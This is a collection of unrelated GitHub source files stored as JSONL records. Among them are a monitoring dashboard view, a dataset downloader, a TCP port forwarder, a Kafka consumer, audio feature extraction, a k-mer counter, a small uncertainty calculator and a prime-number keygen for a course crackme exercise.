+{"seq_id":"32542636287","text":"__author__ = 'niean'\nfrom rrd import app\nfrom flask import request, g, render_template, jsonify\nfrom rrd.model.portal.poly import PolyMetric\nfrom rrd.utils.params import required_chk\nfrom rrd.utils.logger import logging\nfrom rrd.utils.format import replace_str_for_counter\nfrom rrd.config import *\nlog = logging.getLogger(__file__)\n\n\ndef gen_single_poly_grafana_link(grp_p, metric_p):\n '''\n\n https://grafana.xxxx.com/d/single_metric_falcon_poly_metric/single_metric_falcon_poly_metric?orgId=1\n &refresh=1m&var-metric_line=cpu_busy&var-metric=cpu.busy\n &var-poly_res_sum=poly_res_cpu_busy_sum&var-poly_res_avg=poly_res_cpu_busy_avg\n # &&var-falcon_poly_name=falcon_group_poly_data_system_openfalcon\n # &var-grp_name=data_system_openfalcon&\n # var-prome=falcon_group_data_system_openfalcon&\n # &var-group_name_point=data.system.openfalcon\n :return:\n '''\n prome_metric = replace_str_for_counter(metric_p.split('/',1)[0])\n\n grp_l = replace_str_for_counter(grp_p)\n metric_l = replace_str_for_counter(metric_p)\n url = '{}&var-grp_name={}&var-group_name_point={}&var-falcon_poly_name=falcon_group_poly_{}&var-prome=falcon_group_{}&var-poly_res_sum=poly_res_{}_sum&var-poly_res_avg=poly_res_{}_avg&var-metric_line={}&var-metric={}&var-prome_metric={}'.format(\n\n GRAFANA_SINGLE_POLY_URL,grp_l, grp_p, grp_l, grp_l, prome_metric, prome_metric, metric_l, metric_p,prome_metric)\n # print(url)\n return url\n\n\n@app.route('/portal/poly')\ndef polys_get():\n page = int(request.args.get('p', 1))\n limit = int(request.args.get('limit', 20))\n query = request.args.get('q', '').strip()\n mine = request.args.get('mine', '1')\n me = g.user.name if mine == '1' else None\n vs, total = PolyMetric.query(page, limit, query, me)\n\n new_vs = []\n for v in vs:\n setattr(v,'g_url',gen_single_poly_grafana_link(v.name,v.counter))\n new_vs.append(v)\n return render_template(\n 'portal/poly/list.html',\n data={\n # 'vs': vs,\n 'vs': new_vs,\n 'total': total,\n 'query': query,\n 'limit': limit,\n 'page': page,\n 'mine': mine,\n }\n )\n\n\n@app.route('/portal/poly/add')\ndef poly_update_get():\n o = PolyMetric.get(int(request.args.get('poly_id', '0').strip()))\n return render_template('portal/poly/add.html', data={'poly': o})\n\n\n@app.route('/portal/poly/update', methods=['POST'])\ndef poly_update_post():\n poly_id = request.form['poly_id'].strip()\n name = request.form['name'].strip()\n poly_type = request.form['poly_type'].strip()\n counter = request.form['counter'].strip()\n msg = required_chk({\n 'name': name,\n 'poly_type': poly_type,\n 'counter': counter,\n })\n\n if msg:\n return jsonify(msg=msg)\n name = name.split(\"\\n\")\n counter = counter.split(\"\\n\")\n if len(name) == 0 or len(counter) == 0:\n return jsonify(msg=\"name empty or counter empty\")\n res = dict()\n for n in name:\n if not n:\n continue\n\n for c in counter:\n if not c:\n continue\n rr = PolyMetric.save_or_update(\n poly_id,\n n,\n poly_type,\n c,\n g.user.name,\n )\n if rr:\n res[\"name_{}_counter_{}\".format(n, c)] = rr\n if not res:\n return jsonify(msg='')\n return jsonify(msg=str(res))\n # return jsonify(msg=PolyMetric.save_or_update(\n # poly_id,\n # name,\n # poly_type,\n # counter,\n # g.user.name,\n # ))\n\n\n@app.route('/portal/poly/delete/')\ndef poly_delete_get(poly_id):\n poly_id = int(poly_id)\n PolyMetric.delete_one(poly_id)\n return 
jsonify(msg='')\n","repo_name":"ning1875/falcon-dashboard","sub_path":"rrd/view/portal/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"12991148761","text":"from __future__ import annotations\n\nimport logging\nimport os\nfrom pathlib import Path\nfrom typing import Final\n\nimport cv2\nimport requests\n\nDATASET_BASE_URL = \"https://storage.googleapis.com/objectron\"\nLOCAL_DATASET_DIR: Final = Path(os.path.dirname(__file__)) / \"dataset\"\nIMAGE_RESOLUTION: Final = (1440, 1920)\nGEOMETRY_FILENAME: Final = \"geometry.pbdata\"\nANNOTATIONS_FILENAME: Final = \"annotation.pbdata\"\nVIDEO_FILENAME: Final = \"video.MOV\"\n\nAVAILABLE_RECORDINGS = [\n \"bike\",\n \"book\",\n \"bottle\",\n \"camera\",\n \"cereal_box\",\n \"chair\",\n \"cup\",\n \"laptop\",\n \"shoe\",\n]\n\n\ndef ensure_downloaded(src_url: str, dst_path: Path) -> None:\n os.makedirs(dst_path.parent, exist_ok=True)\n if not dst_path.exists():\n logging.info(\"Downloading %s to %s\", src_url, dst_path)\n with requests.get(src_url, stream=True) as req:\n req.raise_for_status()\n with open(dst_path, \"wb\") as f:\n for chunk in req.iter_content(chunk_size=8192):\n f.write(chunk)\n\n\ndef find_path_if_downloaded(recording_name: str, local_dataset_dir: Path) -> Path | None:\n local_recording_dir = local_dataset_dir / recording_name\n paths = list(local_recording_dir.glob(f\"**/{ANNOTATIONS_FILENAME}\"))\n if paths:\n return paths[0].parent\n return None\n\n\ndef get_recording_id_from_name(recording_name: str) -> str:\n recording_ids_raw = requests.get(f\"{DATASET_BASE_URL}/v1/index/{recording_name}_annotations_test\").text\n recording_id = recording_ids_raw.split(\"\\n\")[0]\n return recording_id\n\n\ndef ensure_opencv_version_ok() -> None:\n if cv2.getVersionMajor() == 4 and cv2.getVersionMinor() == 6:\n raise RuntimeError(\n \"\"\"Opencv 4.6 contains a bug which will unpack some videos with the incorrect orientation.\n See: https://github.com/opencv/opencv/issues/22088\n Please upgrade or downgrade as appropriate.\"\"\"\n )\n\n\ndef ensure_recording_downloaded(recording_name: str, dataset_dir: Path) -> Path:\n \"\"\"\n Makes sure the recording is downloaded.\n\n Returns the path to where the dataset is downloaded locally.\n \"\"\"\n ensure_opencv_version_ok()\n\n local_recording_dir = find_path_if_downloaded(recording_name, dataset_dir)\n if local_recording_dir is not None:\n return local_recording_dir\n\n recording_id = get_recording_id_from_name(recording_name)\n local_recording_dir = dataset_dir / recording_id\n recording_url = f\"{DATASET_BASE_URL}/videos/{recording_id}\"\n\n ensure_downloaded(f\"{recording_url}/{VIDEO_FILENAME}\", local_recording_dir / VIDEO_FILENAME)\n ensure_downloaded(f\"{recording_url}/{GEOMETRY_FILENAME}\", local_recording_dir / GEOMETRY_FILENAME)\n ensure_downloaded(\n f\"{DATASET_BASE_URL}/annotations/{recording_id}.pbdata\", local_recording_dir / ANNOTATIONS_FILENAME\n )\n\n return local_recording_dir\n\n\ndef ensure_video_is_split_into_frames(recording_dir: Path, force_reprocess: bool = False) -> None:\n video_path = recording_dir / VIDEO_FILENAME\n frames_dir = recording_dir / \"video\"\n if force_reprocess or not frames_dir.exists():\n logging.info(\"Splitting video at %s into frames in %s\", video_path, frames_dir)\n os.makedirs(frames_dir, exist_ok=True)\n\n vidcap = cv2.VideoCapture(str(video_path))\n success, image = vidcap.read()\n count = 0\n while success:\n cv2.imwrite(f\"{frames_dir}/{count}.jpg\", image)\n success, image = vidcap.read()\n count += 1\n\n\ndef ensure_recording_available(name: str, local_dataset_dir: Path, force_reprocess_video: bool = False) -> Path:\n recording_path = 
ensure_recording_downloaded(name, local_dataset_dir)\n ensure_video_is_split_into_frames(recording_path, force_reprocess_video)\n return recording_path\n","repo_name":"rerun-io/rerun","sub_path":"examples/python/objectron/download_dataset.py","file_name":"download_dataset.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":3502,"dataset":"github-code","pt":"38"}
+{"seq_id":"5534011403","text":"# -*- coding: utf-8 -*-\n# tcp mapping created by wxk at 2021-12-7\n\nimport sys\nimport socket\nimport logging\nimport threading\n\n\n# 端口映射配置信息\nCFG_REMOTE_IP = '127.0.0.1'\nCFG_REMOTE_PORT = 22\nCFG_LOCAL_IP = '0.0.0.0'\nCFG_LOCAL_PORT = 10086\n\n# 接收数据缓存大小\nPKT_BUFF_SIZE = 2048\n\nlogger = logging.getLogger(\"Proxy Logging\")\nformatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',)\n\nstream_handler = logging.StreamHandler(sys.stderr)\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\n\nlogger.setLevel(logging.DEBUG)\n\n# 单向流数据传递\ndef tcp_mapping_worker(conn_receiver, conn_sender):\n while True:\n try:\n data = conn_receiver.recv(PKT_BUFF_SIZE)\n except Exception:\n logger.debug('Connection closed.')\n break\n\n if not data:\n logger.info('No more data is received.')\n break\n\n try:\n conn_sender.sendall(data)\n except Exception:\n logger.error('Failed sending data.')\n break\n\n # logger.info('Mapping data > %s ' % repr(data))\n logger.info('Mapping > %s -> %s > %d bytes.' % (conn_receiver.getpeername(), conn_sender.getpeername(), len(data)))\n\n conn_receiver.close()\n conn_sender.close()\n\n return\n\n# 端口映射请求处理\ndef tcp_mapping_request(local_conn, remote_ip, remote_port):\n remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n remote_conn.connect((remote_ip, remote_port))\n except Exception:\n local_conn.close()\n logger.error('Unable to connect to the remote server.')\n return\n\n # 这种方式是不行的,为什么会被阻塞呢?\n # tcp_mapping_worker(local_conn, remote_conn)\n # tcp_mapping_worker(remote_conn, local_conn)\n\n threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start()\n threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start()\n\n return\n\n# 端口映射函数\ndef tcp_mapping(remote_ip, remote_port, local_ip, local_port):\n local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n local_server.bind((local_ip, local_port))\n local_server.listen(5)\n\n logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')\n\n while True:\n try:\n (local_conn, local_addr) = local_server.accept()\n except Exception:\n local_server.close()\n logger.debug('Stop mapping service.')\n break\n\n threading.Thread(target=tcp_mapping_request, args=(local_conn, remote_ip, remote_port)).start()\n\n logger.debug('Receive mapping request from %s:%d.' % local_addr)\n\n return\n\n# 主函数\nif __name__ == '__main__':\n tcp_mapping(CFG_REMOTE_IP, CFG_REMOTE_PORT, CFG_LOCAL_IP, CFG_LOCAL_PORT)","repo_name":"xk-wang/myfrp","sub_path":"pytest/frpctest.py","file_name":"frpctest.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"38"}
+{"seq_id":"5533801583","text":"# flake8: noqa\nimport os.path as osp\nimport pathlib\n\nfrom yanerf.utils.config import Config\nfrom yanerf.utils.registry import Registry\n\nTRAINER = Registry(\"Trainer\")\n\n\n@TRAINER.register_module()\nclass MyTrainer:\n def __init__(self, lr: int, epochs: int) -> None:\n self.lr = lr\n self.epochs = epochs\n\n\ndef test_builder():\n cfg = Config.fromfile(osp.join(osp.dirname(__file__), \"configs/test_utils_config.yml\"))\n trainer = TRAINER.build(cfg.trainer)\n print(f\"\\nMY CFG: {cfg.pretty_text}\")\n print(trainer.__dict__)\n","repo_name":"xk-huang/yet-another-nerf","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"}
+{"seq_id":"9191816978","text":"from snakemake.utils import read_job_properties\nimport sys\nimport subprocess as sp\nimport json\ncluster_json_file =sys.argv[1]\njobscript = sys.argv[2]\ncustom_config_rules = ['job_to_bundle']\nwith open(cluster_json_file) as j:\n cluster_json = json.load(j)\n#%%\n\nparams = cluster_json['__default__']\njob_properties = read_job_properties(jobscript)\nrule = job_properties['rule']\nif rule in cluster_json:\n for key in cluster_json[rule]:\n params[key] = cluster_json[rule][key]\nelif rule in custom_config_rules:\n # specifify custom configureations specific rules\n print(rule)\n if rule == 'job_to_bundle':\n print(job_properties)\n if job_properties['wildcards']['wc'] == 'Q':\n params = cluster_json['__default__'] \n else:\n outdir = 'script_temp'\n ec_strings = [f\"{key}={job_properties['wildcards'][key]}\" for key in job_properties['wildcards'] ]\n ec_strings = '-'.join(ec_strings)\n output = f'{ec_strings}.{rule}.sh'\n sp.run(f\"grep -v '#!/bin/sh' {jobscript} > {outdir}/{output}\", shell=True)\n sys.exit()\n \nelse:# use default parameters\n params = cluster_json['__default__'] \n\nsbcmd=f'''sbatch --cpus-per-task={params['cpus-per-task']} \\\n --mem={params['mem']} \\\n --time={params['time']} \\\n --job-name={rule} \\\n --partition={params['partition']} \\\n --output=00log/{rule}.out \\\n --error=00log/{rule}.err \\\n {params['extra']} \\\n {jobscript}\n\n'''\nsp.run(sbcmd, shell=True)\n\n\n","repo_name":"vinay-swamy/Snakemake-Horizontal-RuleGroup","sub_path":"cluster-config.py","file_name":"cluster-config.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"42602892030","text":"def solution(jobs):\n cnt = 0\n time = 0\n realtime = 0\n que = []\n x = len(jobs)\n jobs.sort(key=lambda x : x[0])\n\n while cnt < x:\n\n while jobs and jobs[0][0]<=time:\n a, b = jobs.pop(0)\n que.append([a, b])\n que.sort(key = lambda x : x[1])\n if que:\n c, d = que.pop(0)\n time += d\n realtime += time-c\n cnt += 1\n else:\n time += 1\n\n answer = realtime//x\n\n return answer\n\nprint(solution([[0, 3], [1, 9], [2, 6]]\t))","repo_name":"kimss373/solvealgorithm","sub_path":"프로그래머스/디스크 컨트롤러.py","file_name":"디스크 컨트롤러.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"12904245629","text":"from kafka import KafkaConsumer\nimport json\n\n\nclass ConsumerServer(KafkaConsumer):\n def __init__(self, topic_name):\n self.consumer = KafkaConsumer(\n bootstrap_servers=\"localhost:9092\",\n request_timeout_ms=1000,\n auto_offset_reset=\"earliest\",\n max_poll_records=10\n )\n self.consumer.subscribe(topics=topic_name)\n\n def consume(self):\n while True:\n for metadata, consumer_record in self.consumer.poll().items():\n if consumer_record is not None:\n for record in consumer_record:\n print(json.loads(record.value))\n else:\n print(\"no message\")\n\n\nif __name__ == \"__main__\":\n consumer = ConsumerServer(\"calls\")\n consumer.consume()","repo_name":"amaralunao/SF-Crime-Statistics","sub_path":"consumer_server.py","file_name":"consumer_server.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"13466818863","text":"from typing import List\nfrom bisect import bisect_right\nfrom collections import deque\n\n\ndef main():\n def findClosestElements(arr: List[int], k: int, x: int) -> List[int]:\n index = bisect_right(arr, x)\n left, right = index - 1, index\n res = deque()\n for _ in range(k):\n left_val = x - arr[left] if 0 <= left < len(arr) else float('inf')\n right_val = arr[right] - x if 0 <= right < len(arr) else float('inf')\n if left_val <= right_val:\n res.appendleft(arr[left])\n left -= 1\n else:\n res.append(arr[right])\n right += 1\n return list(res)\n\n arr = [1, 2, 3, 4, 5]\n k, x = 4, 3\n print(findClosestElements(arr, k, x))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sanchit-g/DSA-practice-codes","sub_path":"k_closest_elements.py","file_name":"k_closest_elements.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"21023241221","text":"import librosa\nimport librosa.display\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport random\n\nmatplotlib.use('Agg')\n\nclass Loader:\n\n def __init__(self, sample_rate, mono): # offset being time_start and duration is the window_size(seconds)\n self.sample_rate = sample_rate\n self.mono = mono\n\n def load(self, file_path, offset, time_end):\n duration = time_end - offset\n signal, sr = librosa.load(file_path, offset=offset, duration=duration, mono=self.mono, res_type=\"kaiser_fast\")\n return signal, sr\n \n def get_sample(self, signal, offset, time_end, original_sample_rate):\n offset_samples = offset * original_sample_rate\n duration_samples = (time_end - offset) * original_sample_rate\n return signal[offset_samples:offset_samples + duration_samples]\n \n def resample(self, signal, original_sr):\n if self.sample_rate != original_sr:\n signal = librosa.resample(signal, original_sr, self.sample_rate, res_type=\"kaiser_best\")\n return signal\n\nclass Padder: #\n def __init__(self, num_expected_samples, mode = \"constant\"):\n self.num_expected_samples = num_expected_samples\n self.mode = mode\n\n def is_padding_needed(self, len_arr):\n return True if self.num_expected_samples > len_arr else False\n\n def pad(self, array): # padding on the end of the original array\n if self.is_padding_needed(len(array)):\n num_missing_samples = self.num_expected_samples - len(array)\n array = np.pad(array, (0, num_missing_samples), mode=self.mode)\n return array\n\n\nclass MelSpecExtractor:\n\n def __init__(self, sample_rate):\n self.sample_rate = sample_rate\n\n def extract(self, signal):\n mel_signal = librosa.feature.melspectrogram(y=signal, sr=self.sample_rate)[:-1]\n spectogram = np.abs(mel_signal)\n log_spec = librosa.amplitude_to_db(spectogram, ref = np.max)\n return log_spec\n\nclass MFCCExtractor:\n\n def __init__(self, sample_rate):\n self.sample_rate = sample_rate\n\n def extract(self, signal):\n mfccs_features = librosa.feature.mfcc(y=signal, sr=self.sample_rate, n_mfcc=40)\n #in order to find out scaled feature we do mean of transpose of value\n return mfccs_features\n\nclass Saver:\n\n def __init__(self, feature_save_dir):\n self.feature_save_dir = feature_save_dir\n\n def save_feature(self, feature, file_path, offset, time, label,type):\n save_path = self._generate_save_path(file_path, label, offset, time, type)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_yaxis().set_visible(False)\n ax.set_frame_on(False)\n librosa.display.specshow(feature, x_axis=\"time\", y_axis=\"mel\")\n plt.savefig(save_path, bbox_inches='tight', pad_inches = 0)\n plt.clf()\n plt.close(\"all\")\n\n def _generate_save_path(self, file_path, label, offset, time, type):\n ending_str = \"_{}_{}\".format(offset, time)\n file_name = os.path.split(file_path)[1][:-4]\n #save_path = self.feature_save_dir+ type+ label +\"/\" + file_name + ending_str + \"_augmented.png\"\n save_path = file_name + ending_str + \"_augmented.png\"\n return save_path\n\n\n\nclass DataAugmentation:\n\n def __init__(self, sr):\n self.sr = sr\n \n\n def add_white_noise(self, signal, noise_percentage_factor = 0.1):\n noise = np.random.normal(0, signal.std(), signal.size)\n augmented_signal = signal + noise * noise_percentage_factor\n return augmented_signal\n \n def random_gain(self, signal, min_factor=0.1, max_factor=0.12):\n gain_rate = random.uniform(min_factor, max_factor)\n augmented_signal = 
signal * gain_rate\n return augmented_signal\n \n def time_strecth(self, signal, strech_rate = 0.4):\n return librosa.effects.time_stretch(signal, strech_rate)\n \n def pitch_scale(self, signal, num_semitones = 2):\n return librosa.effects.pitch_shift(signal, self.sr, num_semitones)\n\nclass MinMaxNormaliser:\n\n def __init__(self, min_val, max_val):\n self.min = min_val\n self.max = max_val\n\n def normalise(self, array):\n a = (array - array.min())\n b = (array.max() - array.min())\n norm_array = np.divide(a, b, out=np.zeros_like(a), where=b!=0)\n norm_array = norm_array * (self.max - self.min) + self.min\n return norm_array\n\nclass PreProcessingPipeline:\n\n def __init__(self, loader, padder, feature_extractor, saver, normaliser, data_augmentation):\n self.loader = loader\n self.padder = padder\n self.feature_extractor = feature_extractor\n self.normaliser = normaliser\n self.saver = saver\n self.data_augmentation = data_augmentation\n self.current_file = None\n self.current_signal = None\n self.current_sr = None\n\n def _process_file(self, file_path, offset, time_end,label, type):\n signal,sr = self.loader.load(file_path, offset, time_end)\n signal = self.loader.resample(signal, sr)\n signal = self.padder.pad(signal)\n augmentation = random.randint(0,1)\n feature_orig = self.feature_extractor.extract(signal)\n feature_orig = self.normaliser.normalise(feature_orig)\n feature_pitch = self.feature_extractor.extract(self.data_augmentation.pitch_scale(signal))\n feature_pitch = self.normaliser.normalise(feature_pitch)\n feature_time_streched = self.feature_extractor.extract(self.data_augmentation.time_strecth(signal))\n feature_time_streched = self.normaliser.normalise(feature_time_streched)\n return feature_orig, feature_pitch, feature_time_streched\n # if augmentation == 0:\n # signal = self.data_augmentation.pitch_scale(signal)\n # else:\n # signal = self.data_augmentation.add_white_noise(signal)\n \n # feature = self.feature_extractor.extract(signal)\n # feature = self.normaliser.normalise(feature)\n #feature = feature[..., np.newaxis]\n #self.saver.save_feature(feature, file_path, offset, time_end, label, type)\n\n def process(self, dataframe, type):\n for row in dataframe.itertuples():\n try:\n self._process_file(row.File_path, row.Time_start, row.Time_end, row.Label, type)\n except:\n print(row.File_path, row.Time_start, row.Time_end)\n continue\n\n\nif __name__ == \"__main__\":\n DURATION = 3\n SAMPLE_RATE = 22050\n NUM_EXPECTED_SAMPLES = DURATION * SAMPLE_RATE\n MONO = True\n\n FEATURE_SAVE_DIR = \"mel_augment/\"\n RANDOM_FILE = r\"D:\\Projects\\DL_Violence_Pytorch\\fs\\datasets\\av\\dataset_main\\Hanau02\\i3\\Hanau02_i3_026_center_top_wav_audio_ros.wav\"\n\n \n loader = Loader(SAMPLE_RATE, MONO)\n padder = Padder(NUM_EXPECTED_SAMPLES)\n mel_extractor = MelSpecExtractor(SAMPLE_RATE)\n min_max_normaliser = MinMaxNormaliser(0, 1)\n mfcc_extractor = MFCCExtractor(SAMPLE_RATE)\n saver = Saver(FEATURE_SAVE_DIR)\n data_augmentation = DataAugmentation(SAMPLE_RATE)\n pipeline = PreProcessingPipeline(loader, padder, mel_extractor, saver, min_max_normaliser, data_augmentation)\n #feature = pipeline._process_file(RANDOM_FILE, 52, \"violent\", \"training/\")\n\n","repo_name":"EduardoGit-1/DL-based-algorithm-for-violence-detection-in-audio-data","sub_path":"additional_tests/mel_augment/mel.py","file_name":"mel.py","file_ext":"py","file_size_in_byte":7360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"3699361526","text":"from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.pagesizes import A4\n\n\nstyles = getSampleStyleSheet()\n\nTitle = \"Hello World\"\npageinfo = \"Página\"\n\n\ndef myfirstpage(canvas, doc):\n canvas.saveState()\n canvas.setFont(psfontname=\"Times-Bold\", size=16)\n canvas.drawCentredString(x=3*inch, y=10*inch, text=Title)\n canvas.setFont(psfontname=\"Times-Roman\", size=9)\n canvas.drawString(x=1*inch, y=0.75*inch, text=\"Introdução\")\n canvas.restoreState()\n\n\ndef mylaterpages(canvas, doc):\n canvas.saveState()\n canvas.setFont(psfontname=\"Times-Roman\", size=9)\n canvas.drawString(x=1*inch, y=0.75*inch, text=pageinfo)\n canvas.drawString(x=1.5*inch, y=0.75*inch, text=str(canvas.getPageNumber()))\n canvas.restoreState()\n\n\ndef go():\n doc = SimpleDocTemplate(filename=\"platypus_intro.pdf\", pagesize=A4, title=\"Lista\")\n story = [Spacer(1, 2*inch)]\n style = styles[\"Normal\"]\n for i in range(20):\n bogustext = (\"This is Paragraph number %s \" % i) * 10\n paragrafo = Paragraph(bogustext, style)\n story.append(paragrafo)\n story.append(Spacer(width=1, height=0.2*inch))\n\n doc.build(flowables=story, onFirstPage=myfirstpage, onLaterPages=mylaterpages)\n\n return doc\n\n\nif __name__ == '__main__':\n go()\n","repo_name":"jeancharlles/reportpdf","sub_path":"platypus/platypus_intro.py","file_name":"platypus_intro.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"18239540447","text":"#!/usr/bin/python\n#standard imports\nimport sys\n\nk = int(sys.argv[1]) #read first input as k size of kmers\nwith open(sys.argv[2]) as f: #read input file, remove new line character and concatenate lines\n file = \"\".join(line.strip() for line in f.readlines()[1:])\nkmers, bases = list(), tuple(list('ATGC'))\ndef generate_kmers(dna_tup: tuple, kmers: list, k: int)-> dict:\n \"\"\" method to generate all possible combinations of kmers from dna bases\n :param dna_tup: tuple of dna bases\n :param kmers: a list containing combinations\n :param k: k-mer size from user input\n :return: k-mer combinations dictionary\n \"\"\"\n while k:\n kmers = [i + list(j) for i in kmers for j in dna_tup]\n return generate_kmers(dna_tup=dna_tup, kmers=kmers, k=k-1)\n return dict.fromkeys([''.join(x) for x in kmers],0)\nkmer_dict = generate_kmers(dna_tup=bases, kmers=[kmers], k=k) #create dictionary with kmers as keys\nfor key in kmer_dict.keys(): #to find number of occurrences of kmers in fasta read file, insert as values to dict\n if key in file: kmer_dict[key] = sum([1 for i in range(0,len(file)-len(key)+1) if file[i:i+len(key)] == key ])\n[print(key,'\\t',kmer_dict[key]) for key in sorted(kmer_dict.keys()) if kmer_dict[key]][0] #print stdout","repo_name":"rbr7/bioinformatics_courses","sub_path":"prog_bioinformatics/solved_bioinfo_algos/kmer_counter.py","file_name":"kmer_counter.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71744951150","text":"from math import sqrt\r\nfrom sympy import *\r\nfrom tkinter import Tk, Label, Button, Entry, Frame\r\n\r\nclass Uncert_Calc:\r\n def __init__(self, master):\r\n self.master = master\r\n master.title('Uncertainty Propagation Calc')\r\n master.iconbitmap('favicon.ico')\r\n\r\n self.frame = Frame()\r\n self.frame.grid(padx=20, pady=20)\r\n\r\n #instantiate widgets\r\n self.formula_label = Label(self.frame, text='Enter Formula: ')\r\n self.formula_entry = Entry(self.frame)\r\n self.submit_formula = Button(self.frame, text='Continue', command=self.generateEntries)\r\n \r\n self.answer_label = Label(self.frame, text='')\r\n\r\n #show widgets\r\n self.formula_label.grid(row=0)\r\n self.formula_entry.grid(row=0, column=1)\r\n self.submit_formula.grid(row=0, column=2, padx=10)\r\n\r\n self.variables = [] #symbols in function\r\n self.values = [] #values of the symbols\r\n self.uncertainties = [] #uncertainties of those values\r\n self.subsitutions = [] #for subs() sympy function\r\n self.entries = [] #generated entries\r\n #special functions\r\n self.special_2 = ('ln')\r\n self.special_3 = ('cos','sin','tan','sec','csc','cot','log')\r\n self.special_4 = ('acos','asin','atan','asec','acsc','acot')\r\n\r\n def generateEntries(self):\r\n #clear any existing entries, and the rest of the lists\r\n del self.entries[:]\r\n del self.variables[:]\r\n del self.values[:]\r\n del self.uncertainties[:]\r\n del self.subsitutions[:]\r\n \r\n for widget in self.frame.grid_slaves(): #grid_slaves() returns all widgets in grid\r\n if int(widget.grid_info()['row']) > 0:\r\n widget.grid_forget()\r\n\r\n #get formula\r\n funct = self.formula_entry.get()\r\n i = 0\r\n while i < len(funct): #determine variables in function\r\n if funct[i:i+2] in self.special_2:\r\n i+=2\r\n elif funct[i:i+3] in self.special_3:\r\n i+=3\r\n elif funct[i:i+4] in self.special_4:\r\n i+=4\r\n if funct[i].isalpha() and funct[i] not in self.variables:\r\n self.variables.append(funct[i])\r\n i+=1\r\n \r\n #create entries\r\n i=1 #row number\r\n for variable in self.variables: #set variables as symbols in sympy, create values and uncertanties list\r\n var(variable)\r\n Label(self.frame, text=\"Enter the value and uncertainty for '\" + variable +\"': '\").grid(row=i)\r\n entry = Entry(self.frame)\r\n entry.grid(row=i, column=1)\r\n self.entries.append(entry)\r\n i+=1\r\n \r\n #submit button and view answer\r\n submit = Button(self.frame,text='Submit',command=lambda: self.calcUncert(funct))\r\n submit.grid(row=i,padx=10,pady=10)\r\n\r\n def calcUncert(self,f):\r\n funct = f\r\n sumR = 0\r\n \r\n del self.uncertainties[:]\r\n del self.values[:]\r\n \r\n for entry in self.entries:\r\n val_uncert=entry.get().split()\r\n self.values.append(float(val_uncert[0]))\r\n self.uncertainties.append(float(val_uncert[1]))\r\n\r\n for j in range(len(self.variables)): #create subsitutions list\r\n self.subsitutions.append((self.variables[j], self.values[j]))\r\n for i in range(0,len(self.values)): #calculate propogated uncertainty\r\n sumR += (diff(funct, self.variables[i]).subs(self.subsitutions) * self.uncertainties[i])**2\r\n result = sympify(funct).subs(self.subsitutions)\r\n self.answer_label['text'] = 'Answer: ' + str(round(result,3)) + ' +/- ' + str(round(sqrt(sumR),3))\r\n self.answer_label.grid(row=self.frame.grid_size()[1]-1, column=1)\r\n\r\n#run gui \r\nroot = Tk()\r\ngui = 
Uncert_Calc(root)\r\nroot.mainloop()\r\n","repo_name":"igullickson/PyUncertaintyCalc","sub_path":"main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"22496799005","text":"import random\n\ndef keygen():\n key_list = []\n while True:\n #Try to get a good mix of short and long numbers for variety.\n mix = random.randint(1,100)\n if mix % 2 == 0:\n n = random.randint(100,1000)\n else:\n n = random.randint(100000,900000)\n \n isPrime = True\n\n #Check to see if any other number will divide evenly.\n for num in range(2, n):\n if n % num == 0:\n isPrime = False\n break\n\n #Check to see if its prime and length modulo 3 equals 0. \n if isPrime and (len(str(n)) % 3 == 0):\n key_list.append(n)\n\n #Just generate 10 of these.\n if len(key_list) == 10:\n break\n return key_list\n\nkey_list = keygen()\n\nprint('Generated Keys (10): ')\n\nfor p in key_list:\n print(p)\n","repo_name":"xd43D41U5x/CrackMe_Challenges","sub_path":"week_6/keygen.py","file_name":"keygen.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
